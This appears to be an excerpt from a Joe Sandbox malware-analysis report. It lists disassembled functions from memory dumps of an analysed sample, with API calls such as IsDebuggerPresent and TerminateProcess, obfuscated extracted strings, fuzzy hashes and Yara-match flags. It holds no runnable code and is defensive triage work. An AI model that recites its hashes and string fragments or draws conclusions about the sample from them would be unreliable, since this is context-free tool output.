                                            • Instruction ID: d6abe8f475e0eacacdb01f41d916fcddc15cca9a71da71b9b6742f4696070e31
                                            • Opcode Fuzzy Hash: 43224bdd25edf3cd647e313b6fc372e26281ffc7aa97826d06acc6f3f334db7a
                                            • Instruction Fuzzy Hash: 9EB22BF3A0C2049FE3046E2DEC8567AFBE9EF94720F1A493DE6C5C7744EA3558018696
                                            Function 0099ECC2 Relevance: 10.3, Strings: 7, Instructions: 1577COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !=n$"~m$$H}~$UY$nWv$s_mo$s{30
                                            • API String ID: 0-512909168
                                            • Opcode ID: 92336c41f83edaef5c147da8f4815a1044d3038fd108ad429a67486ca4bcf684
                                            • Instruction ID: a742461c19bfc503345a51c1a8adf23fec7d29e238376e95f167cad23a3cf3b9
                                            • Opcode Fuzzy Hash: 92336c41f83edaef5c147da8f4815a1044d3038fd108ad429a67486ca4bcf684
                                            • Instruction Fuzzy Hash: 18B2F6F360C204AFD304AE2DEC8566AF7E5EF94720F1A893DEAC4C3744EA7558418697
                                            Function 0041A306 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 4168288129-2761157908
                                            • Opcode ID: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction ID: 71a107362d346717e648338213b5422f70619b5b18563a803cf0c70334ea4234
                                            • Opcode Fuzzy Hash: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction Fuzzy Hash: 78D22771E092288FDB65CE28DD407EAB7B5EB44314F1441EAD44DE7240E778AEC58F86
                                            Function 0099369B Relevance: 9.9, Strings: 7, Instructions: 1130COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 7Rwu$;w$?Tu7$M~~$uEui$x@6$s3
                                            • API String ID: 0-1099699752
                                            • Opcode ID: 3ff587d0904ef30d78b8a7dedbb0a1519a89b80801a3d3cecc35737ad6e0cb40
                                            • Instruction ID: 741e2071dee629836626839fee26b1955acd89660cc93fb981c144672eac1443
                                            • Opcode Fuzzy Hash: 3ff587d0904ef30d78b8a7dedbb0a1519a89b80801a3d3cecc35737ad6e0cb40
                                            • Instruction Fuzzy Hash: 0272F5F3A0C6009FE304AE29EC4567AB7E6EFD4720F1A893DE6C5C3744E63598058697
                                            Function 0098FFB8 Relevance: 7.5, Strings: 5, Instructions: 1245COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #a_k$@sc$Exo$M)I$>}L
                                            • API String ID: 0-2281292081
                                            • Opcode ID: 2be7c07585bd1797ba4a00982dbf95b3576276c3add1420cfae720254de0f7b7
                                            • Instruction ID: b3f62691ee69ea32b94b5f79f9055a4ca864fc527667c63f8bf6b8bb2caaa7da
                                            • Opcode Fuzzy Hash: 2be7c07585bd1797ba4a00982dbf95b3576276c3add1420cfae720254de0f7b7
                                            • Instruction Fuzzy Hash: 0782E4F260C604AFE304AE2DDC8577ABBE9EF94320F16492DE6C4C3744EA3598158797
                                            Function 0040CDA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,(@), ref: 0040CE9B
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,(@), ref: 0040CEA5
                                            • UnhandledExceptionFilter.KERNEL32(004024E3,?,?,?,?,?,(@), ref: 0040CEB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID: (@
                                            • API String ID: 3906539128-3675327911
                                            • Opcode ID: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction ID: 588a31918c4d7a6a9ba75f52031696ab4f5dbddd8307c033202189b188a5c7dc
                                            • Opcode Fuzzy Hash: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction Fuzzy Hash: 5E31C475911228ABCB21DF65D8897CDBBB4AF08310F5081EAE40CA7291E7749F858F48
                                            Function 00410900 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 1698085c936ca5c6c6a57ee88efec3ce2b030c017204745a192f91a5fd5d0df0
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 8A025C71E002199BDF14CFA9D9806EEBBF1FF48314F24826AE919E7341D775A9818B84
                                            Function 04D20B67 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 7b974b5269c746fab1b2d50eb7f63f185c346b1ab7d2d0233e8b425283e2fae5
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 2A021D71E012299FDF15CFA9C9806ADFBF5FF58318F24826ADA15A7340D731A941CB90
                                            Function 0040A54A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 0040A556
                                            • IsDebuggerPresent.KERNEL32 ref: 0040A622
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A642
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A64C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: 8b01d550a0a2fff4667565f177a0bd7aa15c2cc699040a0714bae659939ad5a8
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 40311A75D0531CDBDB10DFA5D9897CDBBB8BF08304F1080AAE409A7290EB759A858F49
                                            Function 04D1A7B1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 04D1A7BD
                                            • IsDebuggerPresent.KERNEL32 ref: 04D1A889
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04D1A8A9
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 04D1A8B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: f9a2955cd46215fa5113cb004c160572572073cf051d9228f3a072e8e5f29614
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 6831FA75D05319EBDB10DFA4E9497CCBBB8BF08304F1041EAE409AB250EB715A85CF55
                                            Function 00996597 Relevance: 5.4, Strings: 3, Instructions: 1602COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Z9?$7fCN$k[
                                            • API String ID: 0-2801061227
                                            • Opcode ID: 1f35874b3c2e3b81512a1f6f2342deabd891cf32e5b4042eaa5f4b03b7ad1d03
                                            • Instruction ID: aaaea40035f4161904196b081f25d4259236efa4e9126306edf6ac049ec3a964
                                            • Opcode Fuzzy Hash: 1f35874b3c2e3b81512a1f6f2342deabd891cf32e5b4042eaa5f4b03b7ad1d03
                                            • Instruction Fuzzy Hash: 2EB217F360C2049FE3146E29EC8567EFBE9EF94720F1A892DE6C4C3344EA3558458697
                                            Function 00991630 Relevance: 5.3, Strings: 3, Instructions: 1597COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `:@$dSw}$&W
                                            • API String ID: 0-3838474047
                                            • Opcode ID: 68b6cab49ea8060f3a71f2e66ef42c9309d437186e061ad66473642262c31131
                                            • Instruction ID: df62c0245a451c59a69d84e7b0e70bed35c0e64238b6fbca8cfd4e79f1fe9955
                                            • Opcode Fuzzy Hash: 68b6cab49ea8060f3a71f2e66ef42c9309d437186e061ad66473642262c31131
                                            • Instruction Fuzzy Hash: 7CB2E7F360C2049FE704AE29EC8567ABBE5EFD4720F16893DEAC4C7744EA3558018697
                                            Function 04D1D00A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04D12A70), ref: 04D1D102
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04D12A70), ref: 04D1D10C
                                            • UnhandledExceptionFilter.KERNEL32(04D1274A,?,?,?,?,?,04D12A70), ref: 04D1D119
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction ID: 933645556a395dfa24fbc4ef02adb743141ff18040fbb2b2f980f5ea1e49a311
                                            • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction Fuzzy Hash: EB319375901228ABCB21DF64E8887CDBBB4BF18310F5045EAE81CA7260E770AB858F55
                                            Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                            • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                            • ExitProcess.KERNEL32 ref: 10005F60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                            • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                            Function 00999BA9 Relevance: 4.1, Strings: 2, Instructions: 1636COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >5${$ZFo
                                            • API String ID: 0-168576149
                                            • Opcode ID: d2fb36460b316c31f5c9f14a61a34234469bd65b191a375ae807089c6086e159
                                            • Instruction ID: db96329b0407ab2de1b9e60aef067c7b6e04365c210ddf2e53abf8873adf45a9
                                            • Opcode Fuzzy Hash: d2fb36460b316c31f5c9f14a61a34234469bd65b191a375ae807089c6086e159
                                            • Instruction Fuzzy Hash: D9B2F6F3A0C200AFE7046E2DEC8567ABBE5EF94320F1A453DEAC4C3744E63598158697
                                            Function 0099B657 Relevance: 4.0, Strings: 2, Instructions: 1521COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >EA$$\mOu
                                            • API String ID: 0-3185397086
                                            • Opcode ID: 0c4a9a47dc48c6d43f5d7183747ca474172a3ca7b30931f5270219aba500af33
                                            • Instruction ID: be8112b432b1c7713929cf797894a570fdfd5dcdb22d1be4b7943256b60e9f97
                                            • Opcode Fuzzy Hash: 0c4a9a47dc48c6d43f5d7183747ca474172a3ca7b30931f5270219aba500af33
                                            • Instruction Fuzzy Hash: 66B2D0F290C2049FD3046F2DEC8567AFBE9EF94720F1A493DEAC487740EA3558418A97
                                            Function 04D1092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: e160130273fef3913f4162cf9152a8333aea5568fc34e3c3bb4b434c7f997a1a
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: 4F317CB6900609DFDB11DF99D880AADBBF9FF09324F14404AD941A7720D771FA85CBA4
                                            Function 004107E2 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 1518329722-0
                                            • Opcode ID: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction ID: 9ffaf8f16d1feaf21b4895ba9d91ffe558ea63f081936d9fadb7ea4d2284f30e
                                            • Opcode Fuzzy Hash: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction Fuzzy Hash: C2F0F4B5A002147F8724EF6EC8049DFBEE9EBC5370725826AE809D3340D9B4DD82C2D4
                                            Function 0040EEC9 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0Z@$Z@
                                            • API String ID: 0-605451032
                                            • Opcode ID: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction ID: c2704d3dc0eafd102a63da391050ffa25cdd35e93d0e938198e091b07b9d6d51
                                            • Opcode Fuzzy Hash: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction Fuzzy Hash: 7AC1DE709006079ECB34CE69C584A7BBBB1AB45304F184A3FD452BBBD2C339AC59CB59
                                            Function 0040EB87 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$H@
                                            • API String ID: 0-2786613154
                                            • Opcode ID: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction ID: 4a3fd9315a5abbba8fc5c956050257a45ee5a7b78c0dcd4935651e2db0378757
                                            • Opcode Fuzzy Hash: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction Fuzzy Hash: 9CB1E57090460B8BDB24CE6AC555ABFB7A1AF05304F140E3FD592B77C1C739A926CB89
                                            Function 00844233 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4oz$Z_w_
                                            • API String ID: 0-3189895330
                                            • Opcode ID: d88f120c96f9d7210a929dfc8b24fbfb0ee7b6227cadcbea2a603efc5187d7e3
                                            • Instruction ID: adc6b3290ba318e1d4a402494d4c0c6dc826a04e65e40405a905db4013291aa3
                                            • Opcode Fuzzy Hash: d88f120c96f9d7210a929dfc8b24fbfb0ee7b6227cadcbea2a603efc5187d7e3
                                            • Instruction Fuzzy Hash: 6F6137B3A081109FE308AA6DEC5177ABBD5EBD4321F16493EEAC5D7384ED355C018786
                                            Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                            • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                            Function 004156EE Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004156E9,?,?,00000008,?,?,0041C64A,00000000), ref: 0041591B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: 5bcf9fd90164e7ff1602427bca0bed587a5bb36a9d426d5c8fdac6ccf5812400
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 72B16C71520A08CFD715CF28C48ABE57BE0FF85364F258659E8A9CF2A1C339D992CB45
                                            Function 04D25955 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04D25950,?,?,00000008,?,?,04D2C8B1,00000000), ref: 04D25B82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: 2801b67b2afc963d8376e690285d170d14bccdb0fdf469fad0e48d5a5d77fad3
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 16B15A31210618EFD714CF28D59AB647BE0FF55369F298698E89ACF2A1D335E981CB40
                                            Function 0040A2AC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A2C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FeaturePresentProcessor
                                            • String ID:
                                            • API String ID: 2325560087-0
                                            • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction ID: f7b9881a7c7b2d148b80d66715c196e1d6a207a6bc978660656b7b5c1fc1941f
                                            • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction Fuzzy Hash: 395126B1E00705DBDB24CF95D885BAEBBE0FB48314F24843AD845EB3A0D37899518B99
                                            Function 04D1F130 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction ID: 266aa6246b0e6035129194902af3578424b33895b1f6540046232cb440783f45
                                            • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction Fuzzy Hash: 83C1CA74A04606BEDB24CFA8E5846BABBB1FB46304F144A1DDC96D76B1D330F946CB60
                                            Function 04D1EDEE Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction ID: 751bda975517a49aa0e36fbb871a69ea3996f59e66c6ce64cf4c091bd36cf6aa
                                            • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction Fuzzy Hash: C7B1AF70B0460AABDB24CF68E994ABEBBA1FF44304F14061EED96976B0D731F641CB51
                                            Function 0082586D Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTDL
                                            • API String ID: 0-3662016964
                                            • Opcode ID: b8ebaf3dd641c9cd7850e625d9ae9fb37946fa8ca6ee77fe068cc95c7a2a8eae
                                            • Instruction ID: f6cae74657e03948cd5303e53a9b7fd65d8ecab369a71eeb2877a2e85ec86cf4
                                            • Opcode Fuzzy Hash: b8ebaf3dd641c9cd7850e625d9ae9fb37946fa8ca6ee77fe068cc95c7a2a8eae
                                            • Instruction Fuzzy Hash: 30811472988A3E8FDB158F14E5811EF7BE1FB56334F30412AD842D7A02E2B24DD19B58
                                            Function 0040A6E0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000A6EC,0040A064), ref: 0040A6E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
